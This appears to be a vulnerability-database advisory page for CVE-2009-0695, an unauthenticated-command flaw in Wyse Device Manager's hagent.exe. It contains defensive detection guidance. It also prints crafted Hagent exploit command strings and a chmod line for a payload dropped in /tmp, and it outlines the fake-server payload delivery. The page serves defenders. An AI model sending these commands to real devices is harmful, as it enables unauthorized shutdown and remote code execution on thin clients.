cbcvebase.
CVE-2009-0695
published 2012-06-19

CVE-2009-0695: hagent.exe in Wyse Device Manager (WDM) 4.7.x does not require authentication for commands, which allows remote attackers to obtain management access via a…

PriorityP274high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
68.89%
99.3th percentile
hagent.exe in Wyse Device Manager (WDM) 4.7.x does not require authentication for commands, which allows remote attackers to obtain management access via a crafted query, as demonstrated by a V52 query that triggers a power-off action.

Affected

3 ranges
VendorProductVersion rangeFixed in
dellwyse_device_manager
dellwyse_device_manager
dellwyse_device_manager

Detection & IOCsextracted from sources · hover to see the quote

processhagent.exe
command&V52&CI=3|MAC=<mac>|<rhost>|RB=0|MT=3||HS=<rhost>|PO=<rport>|SPO=0|
command&V54&CI=3|MAC=<fakemac>|IP=<rhost>MT=3|HS=<fakerapport>|PO=<wdmserver_port>|
command|EX \x0f//bin//chmod\xfc+x\xfc//tmp//<malfile>\x0f|
  • Detect unauthenticated V52 query packets to hagent.exe on TCP/80 — a V52 query with RB=0 and MT=3 fields triggers a remote power-off action with no authentication required.
  • Alert on raw TCP connections to port 80 of Wyse thin-client hosts containing the string '&V52&' or '&V54&' in the request body, which are exploit-specific Hagent protocol command markers.
  • Monitor for the Hagent protocol response '&00' from a Wyse device, which indicates successful command execution (e.g., power-off) by an attacker.
  • Detect outbound FTP connections (TCP/21) from Wyse thin-client hosts to unexpected external IPs following an inbound V54 Hagent command — this indicates the fake-server exploit stage where the target downloads a malicious executable.
  • Alert on Wyse Linux thin-clients executing binaries from /tmp/ (e.g., random-named .bin files) — the exploit drops and executes a payload at //tmp/<random>.bin.
  • Alert on Wyse Windows XPe thin-clients executing random-named .exe files from C:\ root — the exploit drops and executes a payload at C:\<random>.exe.
  • Detect Hagent protocol HTTP requests containing V01, V55, or POST verbs with '&UP0|&SI=1|UR=9' in the body — these are the fake-server update command sequences used to push malicious payloads.
  • ·The exploit targets Wyse Device Manager (WDM) 4.7.x specifically; the Hagent service listens on TCP/80 by default but the HTTP server port used in the fake-server variant is dynamically assigned and may vary.
  • ·The FTP server used to deliver the payload MUST run on port 21; the exploit explicitly checks and aborts if SRVPORT is not 21.
  • ·The MAC address field in the crafted Hagent query is randomly generated per session, so MAC-based IOCs are not reliable for detection.
  • ·The dropped payload filename is randomized (4–11 alphanumeric characters) on each exploit run; static filename-based detection will not be effective.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.